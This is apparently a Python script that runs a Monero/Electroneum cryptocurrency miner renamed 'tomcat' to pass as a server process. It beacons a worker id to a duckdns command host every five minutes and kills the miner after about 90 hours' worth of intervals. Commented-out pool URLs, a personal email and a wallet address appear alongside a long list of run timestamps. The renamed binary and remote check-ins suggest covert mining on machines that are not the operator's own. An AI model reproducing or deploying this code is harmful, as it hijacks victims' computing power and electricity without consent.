import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:33:07.591618
#2018-02-17 16:19:03.617794
#2018-02-17 18:06:05.249734
#2018-02-17 19:53:01.604341
#2018-02-17 21:40:06.256920
#2018-02-17 23:24:02.180259
#2018-02-18 01:13:02.100931
#2018-02-18 03:01:05.158121
#2018-02-18 04:50:04.157473
#2018-02-18 06:40:02.023433
#2018-02-18 08:29:04.331383
#2018-02-18 10:16:07.962509
#2018-02-18 12:02:04.844406
#2018-02-18 13:47:01.807493
#2018-02-18 15:39:05.945455
#2018-02-18 17:28:04.011197
#2018-02-18 19:15:07.427379
#2018-02-18 21:01:07.268876
#2018-02-18 22:47:01.579333
#2018-02-19 00:36:03.761246
#2018-02-19 02:21:08.068743
#2018-02-19 04:08:05.145615
#2018-02-19 05:52:03.851723
#2018-02-19 07:40:07.289610
#2018-02-19 09:29:06.733829
#2018-02-19 11:18:05.815223
#2018-02-19 13:06:06.122108
#2018-02-19 14:54:01.707495
#2018-02-19 16:41:08.808443
#2018-02-19 18:28:08.917016
#2018-02-19 20:14:01.669985
#2018-02-19 22:04:02.181647
#2018-02-19 23:50:04.728362
#2018-02-20 01:37:07.482527
#2018-02-20 03:25:09.234421
#2018-02-20 05:12:01.407488
#2018-02-20 06:54:06.647797
#2018-02-20 08:41:04.493425
#2018-02-20 10:25:07.618325
#2018-02-20 12:11:06.365017
#2018-02-20 13:58:06.025158
#2018-02-20 15:42:04.944355
#2018-02-20 17:27:07.294671
#2018-02-20 19:16:07.095521
#2018-02-20 21:05:08.887357
#2018-02-20 22:51:05.849390
#2018-02-21 00:33:01.864640
#2018-02-21 02:18:08.585178
#2018-02-21 04:07:05.995875
#2018-02-21 05:54:05.449960
#2018-02-21 07:43:04.656305
#2018-02-21 09:29:05.244283
#2018-02-21 11:18:04.780989
#2018-02-21 13:07:07.268899
#2018-02-21 14:53:01.896255
#2018-02-21 16:43:07.762697
#2018-02-21 18:34:01.715058
#2018-02-21 20:19:04.221987
#2018-02-21 22:09:01.607309
#2018-02-21 23:59:06.593633
#2018-02-22 01:47:06.554162
#2018-02-22 03:34:04.520383
#2018-02-22 05:20:07.522716
#2018-02-22 07:08:04.425602
#2018-02-22 08:56:01.988837
#2018-02-22 10:44:04.399731
#2018-02-22 12:32:05.328618
#2018-02-22 14:17:01.535476
#2018-02-22 16:04:07.072311
#2018-02-22 17:51:05.017037
#2018-02-22 19:38:05.568874
#2018-02-22 21:29:05.982651
#2018-02-22 23:15:09.332918
#2018-02-23 01:02:07.210881
#2018-02-23 02:51:06.035017
#2018-02-23 04:39:05.468552
#2018-02-23 06:25:08.534018
#2018-02-23 08:12:04.836392
#2018-02-23 10:27:07.625229
#2018-02-23 12:20:02.941641
#2018-02-23 14:09:02.047398
#2018-02-23 16:01:06.447445
#2018-02-23 17:47:01.869075
#2018-02-23 19:33:01.655299
#2018-02-23 21:15:10.751700
#2018-02-23 23:02:07.564928
#2018-02-24 00:49:03.944954
#2018-02-24 02:40:01.426741
#2018-02-24 04:34:06.998041
#2018-02-24 06:19:03.580949
#2018-02-24 08:06:06.994096
#2018-02-24 09:50:04.371155
#2018-02-24 11:45:08.800658
#2018-02-24 13:36:06.632088
#2018-02-24 15:24:04.217230
#2018-02-24 17:13:05.559865
#2018-02-24 19:05:06.363123
#2018-02-24 20:54:05.849323
#2018-02-24 23:19:01.272106
#2018-02-25 02:43:06.098876
#2018-02-25 06:27:01.372546